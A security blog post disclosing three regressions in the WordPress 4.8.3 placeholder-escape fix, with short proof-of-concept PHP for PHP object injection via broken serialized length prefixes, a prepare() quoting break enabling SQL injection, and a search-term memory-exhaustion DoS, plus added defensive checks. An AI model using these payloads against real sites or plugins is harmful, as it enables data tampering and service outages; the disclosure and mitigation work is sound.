Wordpress 4.8.3 - wrecking ball

The Wordpress 4.8.3 security “fix” solved something already reported 10+ months ago and introduced 3 new features:

  • PHP object injection
  • SQLi
  • DoS

Below I’ll place very short technical details that are more than enough for intermediate wp developers to understand the threat of the issues, to locate them in their plugins/themes and to fix them. For the Wordpress core those will probably be “only in theory” issues that don’t affect anything, but time will tell for sure :).

Disclaimer: I have told everything to the wp team (you can see it in this, most probably public by now, h1 report), but it seems they believe your words and give credit for reported vulnerabilities (the 4.8.3 issue was known ~11 months ago and the PHP object injection warning feature was advised ~11 months ago too) only if you have a huge number of followers on social media… NVM, let’s go!

PHP object injection

If you place the following code in the hello dolly plugin and activate it

```php
function goatgoat(){
    global $wpdb;
    $arr = array(
        "o\"ne",
        "%two",
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxtr1\";i:2;s:1:\"!\";}"
    );
    $arr = esc_sql($arr);     // 4.8.3: escapes the quote and swaps every % for the {hash} placeholder
    $arr = wp_unslash($arr);  // strips the backslashes again; the placeholder stays
    // maybe_serialize() counts string lengths with the placeholder still inside,
    // remove_placeholder_escape() then shortens the strings but not the s:N: prefixes
    $payload = $wpdb->remove_placeholder_escape(maybe_serialize($arr));
    echo "<pre>";
    print_r(unserialize($payload));
    exit;
}
add_action("init", "goatgoat");
```

will display:

```text
Array
(
[0] => o"ne
[1] => %two";i:2;s:68:"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxtr1
[2] => !
)
```

Looks familiar? Bonus: it works in the opposite direction too!
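To make the length-prefix problem visible without WordPress, here is an added stand-alone example (not code from the post or from WordPress). It assumes a fixed `{deadbeef}` token in place of the per-request hash WordPress uses, models `add_placeholder_escape()`/`remove_placeholder_escape()` as plain `str_replace()` calls, and wraps `unserialize()` in a check that a defender would want: no objects, and the decoded value must re-serialize to exactly the bytes that came in.

```php
<?php
// Added example, not WordPress code. Shows why escaping or unescaping a string
// AFTER it has been serialized breaks the s:N:"..." length prefixes, in both
// directions, and what order of operations keeps the data intact.
declare(strict_types=1);

const PLACEHOLDER = '{deadbeef}'; // constructed stand-in for the {sha256} token WordPress generates

function add_placeholder_escape(string $s): string
{
    return str_replace('%', PLACEHOLDER, $s);
}

function remove_placeholder_escape(string $s): string
{
    return str_replace(PLACEHOLDER, '%', $s);
}

// Decode only if the blob is well-formed, instantiates no objects, and
// encodes exactly the bytes we were given. The round-trip comparison rejects
// blobs whose lengths were recounted or that carry trailing bytes.
function strict_unserialize(string $blob)
{
    $value = @unserialize($blob, ['allowed_classes' => false]);
    if ($value === false && $blob !== 'b:0;') {
        return null;
    }
    return serialize($value) === $blob ? $value : null;
}

$values = ['o"ne', '%two', 'three'];

// Unsafe order 1: escape per element, serialize, then unescape the whole blob.
// serialize() counted 13 bytes for "{deadbeef}two"; after the replacement only 4 remain.
$blob     = serialize(array_map('add_placeholder_escape', $values));
$tampered = remove_placeholder_escape($blob);
$unsafe1  = strict_unserialize($tampered);            // null

// Unsafe order 2 (the "opposite direction"): serialize, then escape the blob.
// Now s:4:"{deadbeef}two" claims 4 bytes for a 13-byte string.
$tampered2 = add_placeholder_escape(serialize($values));
$unsafe2   = strict_unserialize($tampered2);          // null

// Safe order: finish every per-string transformation first, serialize last.
$safe = strict_unserialize(serialize(
    array_map('remove_placeholder_escape', array_map('add_placeholder_escape', $values))
));

var_dump($unsafe1 === null, $unsafe2 === null, $safe === $values); // bool(true) three times
```

With a plain third element both tampered blobs simply fail to decode; a crafted third element like the one in the post makes `unserialize()` succeed with shifted boundaries, and `strict_unserialize()` still rejects it because the re-serialized value no longer matches the input byte for byte. The `allowed_classes => false` option (PHP 7.0+) is the part that takes object injection off the table even when a blob does parse.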

SQLi attack reintroduced

Before someone points to the `esc_sql` function advisory, please think for a moment about the fact that Wordpress is a PHP/MySQL project, so…

```php
function goatgoat1(){
    global $wpdb;
    // "%1$%s" is literal here ($% is not a variable). 4.8.3 rewrites %s to '%s',
    // then vsprintf() treats the resulting '% as a custom padding specifier and
    // the opening quote disappears from the output.
    echo $wpdb->prepare("%1$%s", "magic");
    exit;
}
add_action("init", "goatgoat1");
```

will display:

```text
magic'
```
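The following added example (not from the post or from WordPress) reproduces the `vsprintf()` step on its own, so the lost quote can be seen without a WordPress install, and adds the check a plugin author would want on whatever `prepare()` hands back: every string argument must appear wrapped in single quotes. The format string `"%1\$'%s'"` is the one 4.8.3 builds from the post's `"%1$%s"`; the check function and its name are assumptions for illustration.

```php
<?php
// Added example, not WordPress code. PHP's sprintf accepts a custom padding
// character written as a single quote followed by any byte, so in the format
// %1$'%s' the opening quote and the inner % are consumed as a padding spec
// and the formatted value comes out with only its trailing quote.
declare(strict_types=1);

// Exactly what vsprintf() does with the format prepare() produced for the PoC.
function quoting_lost(): string
{
    return vsprintf("%1\$'%s'", ['magic']);   // "magic'" (no opening quote)
}

// Sanity check on a prepared statement: every occurrence of each string
// argument must sit between single quotes. It inspects quoting only;
// escaping of the value itself is still the caller's job.
function string_args_quoted(string $sql, array $args): bool
{
    foreach ($args as $arg) {
        if (!is_string($arg) || $arg === '') {
            continue;
        }
        $offset = 0;
        while (($pos = strpos($sql, $arg, $offset)) !== false) {
            $before = $pos > 0 ? $sql[$pos - 1] : '';
            $after  = $sql[$pos + strlen($arg)] ?? '';
            if ($before !== "'" || $after !== "'") {
                return false;
            }
            $offset = $pos + strlen($arg);
        }
    }
    return true;
}

var_dump(quoting_lost());                                                 // string(6) "magic'"
var_dump(string_args_quoted(quoting_lost(), ['magic']));                  // bool(false)
var_dump(string_args_quoted("SELECT 1 WHERE x = 'magic'", ['magic']));    // bool(true)
```

The check is a heuristic: an argument whose value also happens to appear inside an identifier in the query will trip it, which is the safer direction to fail in. The practical takeaway for plugin code is to keep `%s` placeholders free of surrounding width, padding or position modifiers, since 4.8.3 only adds quotes around a bare `%s`.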

DoS punchbag

The following is held in memory when you hit search in Wordpress

```sql
((wp_posts.post_title LIKE '{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}test{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}') OR (wp_posts.post_excerpt LIKE '{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}test{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}') OR (wp_posts.post_content LIKE '{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}test{5944533a7bbf0e39b0751657f6618c4003a77dc4d2a15581d17deef104a124a8}'))
```

What if the search term were ~post_max_size long? A lovely PoC that introduces a new formula for calculating memory_limit in PHP when hosting Wordpress, in order to prevent an out-of-memory fatal error. The formula would be:

memory_limit >= post_max_size * 66 * 3
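To see where the 66 and the 3 in that formula come from, here is an added stand-alone example (not the post's or WordPress's code) that rebuilds the three-column LIKE clause shown above. It assumes a constructed 66-byte `{…}` token in place of the real hash, uses the same `addcslashes($text, '_%\\')` call that WordPress's `esc_like()` performs, and adds a byte-budget guard that a host or plugin could apply to a search term before the query is built.

```php
<?php
// Added example, not WordPress code. Builds the clause from the post with a
// stand-in placeholder, measures how a term grows once every % (the LIKE
// wildcards and the user's own escaped % characters) becomes 66 bytes across
// three columns, and shows a pre-query size cap as the mitigation.
declare(strict_types=1);

// 64 hex characters in braces, the same shape as the token in the post (constructed value)
define('PLACEHOLDER', '{' . str_repeat('0f', 32) . '}');   // 66 bytes

// Same call WordPress's wpdb::esc_like() makes: backslash-escape _ % and \
function esc_like(string $text): string
{
    return addcslashes($text, '_%\\');
}

function add_placeholder_escape(string $s): string
{
    return str_replace('%', PLACEHOLDER, $s);
}

// One (col LIKE '%term%') group per column, then every % becomes the placeholder,
// which is what the query above looks like after prepare() in 4.8.3.
function search_clause(string $term, array $columns): string
{
    $like  = '%' . esc_like($term) . '%';
    $parts = [];
    foreach ($columns as $col) {
        $parts[] = "($col LIKE '" . $like . "')";
    }
    return add_placeholder_escape('(' . implode(' OR ', $parts) . ')');
}

// Worst case behind the post's formula: a term made only of % characters.
function worst_case_bytes(int $term_len, int $columns = 3): int
{
    $cols = array_fill(0, $columns, 'wp_posts.c');
    return strlen(search_clause(str_repeat('%', $term_len), $cols));
}

// Mitigation: refuse a term whose expanded clause would exceed a byte budget
// before any SQL is assembled or sent.
function within_budget(string $term, int $budget, array $columns): bool
{
    return strlen(search_clause($term, $columns)) <= $budget;
}

$cols = ['wp_posts.post_title', 'wp_posts.post_excerpt', 'wp_posts.post_content'];
echo search_clause('test', $cols), "\n";
printf("1000 x '%%' expands to %d bytes (%.1f bytes per input byte)\n",
    worst_case_bytes(1000), worst_case_bytes(1000) / 1000);
var_dump(within_budget('test', 4096, $cols));                   // bool(true)
var_dump(within_budget(str_repeat('%', 1000), 4096, $cols));    // bool(false)
```

Each input `%` becomes `\%` through `esc_like()`, and then the `%` inside it becomes the 66-byte token, so the per-byte growth is slightly above 66 × 3 once the backslashes are counted; the two wildcards around the term add a constant 2 × 66 bytes per column on top. Capping the expanded size rather than the raw term length is what keeps the guard honest for terms that are mostly `%`.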

Summary

To be honest I was expecting more from authorities like the wp core security team and our rant master, but here we are. The latest Wordpress security “fix” came in like a wrecking ball, and here are our reactions:

Promo

If you are a wp developer, wp host provider or wp security product provider with a valuable list of clients, we offer a subscription list and we are exceptional (B2B only).
